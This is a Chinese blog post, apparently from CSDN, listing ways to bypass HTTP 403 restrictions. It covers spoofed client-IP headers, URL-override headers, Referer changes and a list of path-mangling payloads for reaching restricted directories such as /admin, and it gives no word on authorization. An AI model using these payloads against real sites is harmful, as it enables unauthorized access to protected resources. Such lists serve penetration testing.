手把手教你绕过403访问资源

最新推荐文章于 2024-04-26 22:03:48 发布
最新推荐文章于 2024-04-26 22:03:48 发布
阅读量3.6k 收藏 7
点赞数 1
文章标签: 网络安全 web安全 windows 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MachineGunJoe/article/details/131611385
版权

在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。

这就意味着这里面有东西,我们只需绕过它。

造成403的原因

先来看看造成403可能得原因有哪些?

1、你的IP被列入黑名单。

2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。

3、网站域名解析到了空间,但空间未绑定此域名。

4、你的网页脚本文件在当前目录下没有执行权限。

5、在不允许写/创建文件的目录中执行了创建/写文件操作。

6、以http方式访问需要ssl连接的网址。

7、浏览器不支持SSL 128时访问SSL 128的连接。

8、在身份验证的过程中输入了错误的密码。

9、DNS解析错误,手动更改DNS服务器地址。

10、连接的用户过多,可以过后再试。

11、服务器繁忙,同一IP地址发送请求过多,遭到服务器智能屏蔽。

绕过方式

1)修改user-agent

有的应用为了区分爬虫或者正常请求,会验证user-agent,看是否浏览器发出的请求。

2)绕过IP限制

部门网站只允许特定的IP进行访问,应该会验证客户端的IP,如果不是规定的IP,则会返回403。

可以通过下面的方式绕过:

X-Originating-IP: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Client-IP: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Forwared-Host: 127.0.0.1

X-Host: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

3)修改Referer

网站限制了访问来源,如果访问来源不符合,则也会返回403

绕过方式:

设置referer为访问网站的host

4)url覆盖绕过

用户可以使用X-Original-URL或X-Rewrite-URL HTTP请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制。

可以这样绕过的原因:有很多的web应用,只对uri地址内容进行权限检查,这就导致uri路径正常访问之后,我又覆盖了新的地址,导致403 ByPass

请求包

GET / HTTP/1.1
X-Original-URL: /adminstration
X-Rewrite-URL: /adminstration
Host: www.abc.com
Host: 192.168.56.108

5)扩展名绕过

基于扩展名,用于绕过403受限制的目录。

site.com/admin => 403

site.com/admin/ => 200

site.com/admin// => 200

site.com//admin// => 200

site.com/admin/* => 200

site.com/admin/*/ => 200

site.com/admin/. => 200

site.com/admin/./ => 200

site.com/./admin/./ => 200

site.com/admin/./. => 200

site.com/admin/./. => 200

site.com/admin? => 200

site.com/admin?? => 200

site.com/admin??? => 200

site.com/admin…;/ => 200

site.com/admin/…;/ => 200

site.com/%2f/admin => 200

site.com/%2e/admin => 200

site.com/admin%20/ => 200

site.com/admin%09/ => 200

site.com/%20admin%20/ => 200

常用payload汇总

$1代表HOSTNAME

$2代表PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
* $1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

常用工具

BurpSuite插件 403Bypasser:可以在burp扩展商店安装

BurpSuite插件 BurpSuite_403Bypasser

项目地址:GitHub - sting8k/BurpSuite_403Bypasser: Burpsuite Extension to bypass 403 restricted directory

 

我是黑客
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
万字干货:手把手你做需求管理
01-27
通过这篇文章,总结自己在工作实践中需求管理的方法论——普拉姆方法。总结这个方法论的特点是,用最轻量化的投入,与他人协作,并管理需求,推动需求上线。这套方法论组合了项目管理、敏捷开发的知识,希望能对大家有所帮助。本文适合0-2岁产品经理阅读,产品大牛、敏捷管理大师请绕过。总是做迫在眉睫的事情,会令人丧失目标。——《普拉姆原则》 我在工作中体会到每天忙东忙西的处理需求,虽然每天都很充实,但确实极为耗费精力,时间长久就会缺乏动力。上面讲的是个人的角度,如果一个组织或者团队面对大量的需求,在处理需求的时候,没有节奏和规划,会产生消极的影响。从小
html403禁止访问怎么解决,http403禁止访问错误产生的原因以及解决办法
weixin_36203080的博客
06-19 8516
一、http403禁止访问错误产生原因可能大家对404错误更熟悉一些,我们访问网站的时候页面时候看到404的错误标识符。403就是另一种网页错误的标识符。当您试图在浏览器中打开的网页的时候,但您权力访问资源时候,就会发生403禁止错误。之所以称为403错误,是因为这是网站云服务器上的应用程序用来描述这种错误的HTTP状态代码。通常,您会由于以下两个原因之一而收到此错误。第一个原因是Web服务器的...
403禁止访问:访问被拒绝如何解决_403错误代码其实有两层含义,正确理解就能有针对性解决...
weixin_42323064的博客
12-30 4万+
403错误是Http协议中的一个错误状态码,主要意思是客户端请求的URL是被禁止访问的。详细一点说,主要代表了两层意思:1、客户端发出的请求是正确的我们在web浏览器访问某一个网站时,我们的浏览器会根据输入的URL去web服务器请求资源。服务器在接收到请求后,如果发现被请求的资源是被限制或者禁止的,就会返回该错误代码。但同时也相当于告诉我们,客户端发出的请求的正确的。2、服务器端有较高安全设置40...
渗透测试 403绕过~~~满满的干货
qq_59919573的博客
01-31 235
如果我们直接去访问/ylaq/Good这个目录可能是403Forbidden,那么我们可以尝试在后面加个‘/’,即访问/ylaq/Good/,有可能成功绕过,下面整理了一些常用的绕过情况。在Reqeust包中也会包含有我们的IP来源信息,有的资源只允许它本机或者内网IP进行访问,这个时候我们就可以通过使用代理IP来绕过这一限制。可以通过X-Original-URL 和 X-Rewrite-URL请求表头覆盖url中的路径,尝试绕过对更高级别的缓存和web服务器的限制。
渗透技巧之403绕过【总结】
薛定谔嘚喵博客
12-05 1231
绕过 403 Forbidden Error 表示客户端能够与服务器通信,但服务器不允许客户端访问所请求的内容。
手把手你MOS管驱动电流估算
01-20
MOS管驱动电流估算及MOS驱动的几个特别应用解析  MOS管驱动电流估算是本文的重点,如下参数:  有人可能会这样计算:  开通电流  Ion=Qg/Ton=Qg/Td(on)+tr,带入数据得Ion=105nc/(140+500)ns=164mA  关断电流  Ioff=Qg/Toff= Qg/Td(off)+tf,带入数据得Ioff=105nc/(215+245)ns=228mA。  于是乎得出这样的结论,驱动电流只需 300mA左右即可。仔细想想这样计算对吗?这里必须要注意这样一个条件细节,RG=25Ω。所以这个指标没有什么意义。  应该怎么计算才对呢?其实应该是这样的,根据产品的开关
jmc8.0.0-win32.win32.x86_64.zip
12-09
jmc8.0 jdk1.8
cimoc 最新版_cimoc隐藏入口最新版本1.6.1下载,cimoc最新版本1.6.1 - 游戏盒子下载站...
热门推荐
weixin_34885746的博客
01-12 356万+
cimoc隐藏入口最新版本1.6.1拥有最新的漫画资源。你能在这里看到最快更新的漫画资源,这里的漫画种类很广泛,有日漫韩漫还有国漫,不管你喜欢看什么风格这里都会有。这里的漫画资源都是最热门最新的,你可以没有障碍的阅读这些免费资源。软件介绍:1、cimoc最新版本1.6.1是给更多爱追漫的用户提供的掌上搜漫助手;2、高清的阅读界面让大家阅读的很方便,而且不断升级了大家的体验感;3、这里的很多漫画内容...
cimoc 最新版_cimoc1.6.1版本下载-cimoc1.6.1最新版_5577安卓网
weixin_34162851的博客
01-12 171万+
cimoc1.6.1版本下载,这是一款资源超级丰富的漫画软件,平台上的漫画全部支持免费观看,且更新速度极快,使用这款软件,用户永远不会出现漫荒的尴尬情况,喜欢的用户快来下载试试吧!【软件详情】Cimoc怎么更新?Cimoc官方最新版是一款非常不错的漫画阅读软件,Cimoc官方版里具有海量的优质小说资源,用户可一键搜索查询自己喜爱的漫画阅读,同时支持离线下载阅读,线上阅读等功能,让你随时免费阅读漫画...
因提供18禁动漫,毒害未成年人,国内最大动漫网站被重罚
数据森麟
04-18 166万+
公众号后台回复“图书“,了解更多号主新书内容 1.3月11日,扫黄打非官方公众号发布文章《毒害未成年人,“动漫之家”被高限处罚》原因是通过开设隐蔽通道,动漫之家提供《进击的巨人》等22部禁...
python漫画阅读器 漫画网站只能左右翻页,没法上下滚动连续下拉式观看且广告多体验差?因涉及“版权不明”, 审核未通过
zero_mumu的博客
08-18 2万+
没钱看正版漫画,盗版漫画网站只能左右翻页,没法上下滚动观看且广告多体验差?于是我写了个python爬虫。 手机上无论是收费还是免费盗版的漫画都有各种各样的app可供选择,正版的像是腾讯动漫,哔哩哔哩漫画,菠萝包等等,免费的比如动漫之家,免费搜书大全阅读器等等。(说是搜书其实也能看漫画,本质就是一个爬虫);而且阅读的体验也都很不错,且大部分时候也都是在手机上阅读。但当我心血来潮在笔记本上看盗版漫画(穷学生一个)的时候发现很多的盗版漫画网站只有左右翻页观看,翻页很累,而且图片老大一张,网站又没有漫画图片大小调整
手把手你设计大数据流水线.docx
12-17
手把手你设计大数据流水线.docx
手把手你构建数据集.docx
12-16
手把手你构建数据集.docx
手把手你用EXCEL制作日历.pdf
11-16
手把手你用EXCEL制作日历.pdf
18comic
03-10
18漫画
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全安全事件管理处置 — 安全事件处置思路指导
最新发布
享你所想
04-26 701
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全(黑客技术)—2024自学手册
TDJYGC的博客
04-20 1172
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 910
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
手把手你transformer
10-17
好的,关于 Transformer 的手把手程,我可以给你一些简单的步骤: 1. 首先,你需要了解 Transformer 的基本结构和原理,包括 self-attention 机制、多头注意力机制等等。 2. 接着,你需要准备好数据集,并对数据进行预处理,包括分词、编码等等。 3. 然后,你需要搭建 Transformer 模型,包括输入层、编码器、解码器和输出层等等。 4. 在搭建模型的过程中,你需要注意一些细节问题,比如超参数的选择、模型的初始化、正则化等等。 5. 最后,你需要训练模型,并对模型进行评估和调优。 以上是一个简单的手把手程,当然具体实现还需要根据具体情况进行调整和优化。如果你需要更详细的程,可以参考一些开源的 Transformer 实现,比如 Google 的 Tensor2Tensor 和 OpenNMT 等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是黑客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值